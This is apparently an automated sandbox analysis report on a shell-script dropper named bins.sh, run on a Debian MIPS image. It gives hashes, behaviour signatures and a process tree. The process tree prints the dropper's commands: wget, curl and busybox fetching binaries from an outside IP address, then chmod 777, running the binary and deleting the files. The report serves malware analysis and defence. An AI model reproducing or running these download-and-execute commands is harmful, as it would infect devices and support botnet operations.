Analysis

  • max time kernel
    122s
  • max time network
    116s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
  • submitted
    27-10-2024 21:13

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    7b4d271e102cd41b604d6fea5d979e2d

  • SHA1

    56b5d99bae8b5353d96d700fda3d30d396cc9828

  • SHA256

    56f6cd50075fc25241f07867a21d2a0f3b000cd7a9e8baac6a4bb1e0bdb60c91

  • SHA512

    ac1884092a54f7829359fccf4958bfc2add2cc2a89006fc0fadd30221a55d9c559a91e0a83747d00161c63e152fef77f819c20574cbd81fb4bdde05f1ed486c5

  • SSDEEP

    192:C83Wep8P79w808A8uBpzuRtUltYv3WfjIK3qRtUlta808A8uBpKv3WfjaB83hP7W:Crep8P79w808A8uBpzyv3WfjIK38808f

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 5 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:706
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:709
        • /usr/bin/wget
          wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Writes file to tmp directory
          PID:714
        • /usr/bin/curl
          curl -O http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:725
        • /bin/busybox
          /bin/busybox wget http://87.120.126.196/bins/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Writes file to tmp directory
          PID:735
        • /bin/chmod
          chmod 777 GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • File and Directory Permissions Modification
          PID:736
        • /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          ./GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
          • Executes dropped EXE
          PID:737
        • /bin/rm
          rm GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms
          2⤵
            PID:740
          • /usr/bin/wget
            wget http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Writes file to tmp directory
            PID:741
          • /usr/bin/curl
            curl -O http://87.120.126.196/bins/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt
            2⤵
            • Reads runtime system information
            • Writes file to tmp directory
            PID:742

Network

MITRE ATT&CK Enterprise v15


Downloads

        • /tmp/GTsKuVj4s0hueFlloUzz3ytEb6VMBaW6Ms

          Filesize

          100KB

          MD5

          3b78bb645b81d600c30713d416f666be

          SHA1

          23796112f2cce2afb2217498b5ecf2801ab550f2

          SHA256

          d52f8bcb15a590aa5624c446091f1cd0705b68e4647debaeecf8cfa1fe425bd2

          SHA512

          9532ede2d78f1f62f291c8d8d4023c9c579a0bdd042ca11af179adcab96ac2eb178ecb34b9e4b99a33f828694b9839abebabd2ef57dd36d1936027bad1987cf9

        • /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

          Filesize

          101KB

          MD5

          a7e686eb3f74b104a5520f08cfd54eb5

          SHA1

          58b5d9571c85c6a7efc4e57111c3b8e2b2c9bb6b

          SHA256

          617734b61c7e230a72fba8cb8b361bda96cc2d8f40ee358c44a60f1d9b48ab07

          SHA512

          2767d9a7f71319334578015b133474217901747a6e21b0cdc2d591205c2862220e1730bbcee86ff372b2f2261e25bb64d021f9826ce9332d037b5db1c2ea68df

        • /tmp/zSu3Rig2tv4lY9srLgbuCuyUVOeytO0aWt

          Filesize

          40KB

          MD5

          d59ca30fc049e0b93ea6e5fa3a43d3ba

          SHA1

          2942d8c5b503862f4f841c80fddff739bc439cb8

          SHA256

          2cd178aa473e15b45b1581d14ef1568ed847c5e355ce6a92e6c59e8a972a9555

          SHA512

          924b6ce3c1708932413f73cd43e153f74fc7a72ad4ce527414723627a506976748ca69b01ef767510332789d900d91adf9b746cea47579c369ae35738f5ab9fe